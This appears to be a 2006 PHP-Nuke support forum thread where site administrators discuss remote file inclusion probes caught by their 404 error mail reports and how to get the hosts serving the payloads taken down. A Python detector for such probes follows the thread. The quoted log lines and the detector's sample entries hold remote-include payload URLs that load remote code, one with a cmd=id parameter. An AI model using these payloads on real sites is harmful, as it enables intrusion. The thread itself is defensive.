Author |
Message |
Susann
Moderator

Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
|
Posted:
Tue Feb 07, 2006 11:31 am |
|
I'm not using AllMyGuests anymore, but I noticed since I installed the 404 error page with mail function a lot of mails like this with IPs from Brazil and some other countries too:
Quote: |
------------------
201.58.68.105 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.portodemoz.pa.gov.br/su.txt?bug0?
User Agent =
------------------
201.9.158.203 tried to load //include/write.php?dir=http://www.webzenxd.kit.net/tool25.txt?&cmd=id
User Agent =
|
Does this mean someone is running that "D" tool, or is this more automatic? Of course I can ban Brazil completely, but it isn't the solution. How to stop this? |
|
|
|
 |
hitwalker
Sells PC To Pay For Divorce

Joined:
Posts: 5661
|
Posted:
Tue Feb 07, 2006 2:21 pm |
|
indeed my dear Susann.... I'm sure you're glad now having my 404 huh...
yes they are looking for ways to hack the place..
I mailed the Brazilian owners of ...www.webzenxd.kit...etc.... 2 days ago.. and as you visit it you see they finally took the site offline.....
so it is useful to mail providers and pull websites down, even in Brazil.. |
|
|
|
 |
Susann

|
Posted:
Tue Feb 07, 2006 3:43 pm |
|
Thanks Hitwalker,
Yes, the 404 pages are helpful because you are well informed in time. I get my logfiles always one day later.
Because of the cmd and AllMyGuests I googled, and what shocked me is that this d tool can be found on several sites. |
|
|
|
 |
hitwalker

|
Posted:
Tue Feb 07, 2006 3:50 pm |
|
yes I know.... a lot were usually hosted by Yahoo (GeoCities), but they respond faster lately....
yesterday I got a big thank you from an American who had a hacked area on his site he didn't know of..
they uploaded the same stuff that was on the Brazil website.
he was grateful for the warning.....
point is, I didn't have to do that.
if people would do it more often then there would be fewer addresses to abuse. |
|
|
|
 |
Susann

|
Posted:
Tue Feb 07, 2006 4:36 pm |
|
Quote: | if people would do it more often then there would be less addresses to abuse. |
Exactly, that's the problem. Most people are too lazy, or they hesitate to do it because they really don't know what's going on. |
|
|
|
 |
hitwalker

|
Posted:
Tue Feb 07, 2006 4:54 pm |
|
I had another one, Susann; this one was hosted at 100free.
I wrote them ...
(names etc ...are taken out)
Contact Name: hitwalker
Support Issue: please remove the following account.
They just replied with:
This site has been removed from our hosting services for violations of our
TOS (Terms of Service). Additionally, all sites associated with the email
address used to sign up for hosting have been removed. Thank you for
bringing this to our attention.
Nice huh.....  |
|
|
|
 |
Susann

|
Posted:
Tue Feb 07, 2006 8:22 pm |
|
Nice. It's as simple as that  |
|
|
|
 |
Susann

|
Posted:
Fri Feb 10, 2006 9:37 pm |
|
Quote: | I'm sure you're glad now having my 404 huh | Well, it's a never-ending story with the signin.php. There must be some reason why I receive a lot of this kind of mail at the moment. |
|
|
|
 |
hitwalker

|
Posted:
Fri Feb 10, 2006 10:28 pm |
|
yeah I get them too.... but it's getting less now.. also getting some profile.php.... lol
but as you saw by now Susann how busy they are....
but I believe most of them are automatic scripts that pull website URLs like ours from scripts.... then they let a script run with different proxies.
I've seen that a lot by now, same URL over and over like 4 or 5 times within 1 minute with 3 or 4 different IPs. |
|
|
|
 |
Susann

|
Posted:
Sat Feb 11, 2006 5:45 am |
|
Well, I visited some hackers' site after the first email, and I thought at first this could be the reason. But I found 2 interesting articles about the "D" tool; one is from isc.sans.org: "We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically." |
|
|
|
 |
hitwalker

|
Posted:
Sat Feb 11, 2006 6:27 am |
|
well that's all they do...
most people don't even know what's going on on their server..
and we have both ways covered now as I like to believe...
either we get a wannabe hacker attack and Sentinel kills him on site, or they call for a page I don't have and I get the 404 and I kill them personally  |
|
|
|
 |
|
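The two signs discussed in this thread, a 404 report whose query parameter carries a remote URL and the same request arriving from several IPs within a minute, can be checked mechanically. The following Python is an added example, not code from the thread or from NukeSentinel; the (timestamp, IP, URI) entry layout, the timestamps, the documentation-range addresses and the `.invalid` host are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
AMG = "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="

# Constructed entries (timestamp, client IP, requested URI); the timestamp field,
# the documentation-range IPs and the .invalid host are assumptions, not real traffic.
SAMPLE = [
    ("2006-02-10 21:30:05", "192.0.2.10", AMG + "http://files.example.invalid/a.txt?"),
    ("2006-02-10 21:30:20", "198.51.100.7", AMG + "http://files.example.invalid/a.txt?"),
    ("2006-02-10 21:30:41", "203.0.113.44", AMG + "http%3A%2F%2Ffiles.example.invalid%2Fa.txt"),
    ("2006-02-10 21:30:50", "192.0.2.10", AMG + "http://files.example.invalid/a.txt?"),
    ("2006-02-10 21:45:00", "198.51.100.7", "//include/write.php?dir=http://files.example.invalid/t.txt?&cmd=id"),
    ("2006-02-10 21:50:00", "192.0.2.99", "/index.php?page=2"),
]

def remote_include_params(uri):
    """Names of query parameters whose (URL-decoded) value is a remote URL."""
    # Split by hand: urlsplit() would read a leading "//include" as a hostname.
    query = uri.partition("?")[2]
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_SCHEMES)]

def coordinated_probes(entries, window=timedelta(seconds=60), min_ips=3):
    """Map (path, parameter) -> sorted IPs when min_ips distinct clients sent
    the same remote-include probe within one window."""
    hits = defaultdict(list)
    for ts, ip, uri in entries:
        path = re.sub(r"/+", "/", uri.partition("?")[0])  # "//include" -> "/include"
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        for param in remote_include_params(uri):
            hits[(path, param)].append((when, ip))
    flagged = {}
    for target, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            ips = {ip for when, ip in seen[i:] if when - start <= window}
            if len(ips) >= min_ips:
                flagged[target] = sorted(ips)
                break
    return flagged

if __name__ == "__main__":
    for (path, param), ips in coordinated_probes(SAMPLE).items():
        print(f"{path} [{param}] probed by {len(ips)} IPs within 60s: {', '.join(ips)}")
```

Grouping by path and parameter rather than by source IP is what surfaces the proxy rotation: a per-IP ban list would count each of these clients only once or twice.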